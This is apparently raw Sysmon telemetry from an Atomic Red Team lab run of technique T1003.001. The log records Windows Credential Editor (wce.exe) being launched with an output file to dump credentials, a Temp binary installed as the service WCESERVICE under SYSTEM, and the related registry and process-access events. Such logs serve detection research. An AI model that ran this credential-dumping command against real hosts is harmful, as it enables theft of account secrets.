15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\system32\services.exe+3cdc|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe-----C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe -SC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 13241300x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1031,T1050SetValue2020-11-03 15:52:58.605{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ImagePathC:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe -S 13241300x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1031,T1050SetValue2020-11-03 15:52:58.605{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\StartDWORD (0x00000003) 10341000x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0C01-000000008801}1072C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0C01-000000008801}1072C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.590{D28789B6-7CDA-5FA1-0B01-000000008801}11123080C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe{D28789B6-7CDA-5FA1-0C01-000000008801}1072C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+159f0b(wow64)|C:\Windows\System32\KERNELBASE.dll+159bbc(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+11d1|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+2016|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.591{D28789B6-7CDA-5FA1-0C01-000000008801}1072C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt 11241100x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:58.574{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe2020-11-03 15:52:58.574 10341000x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 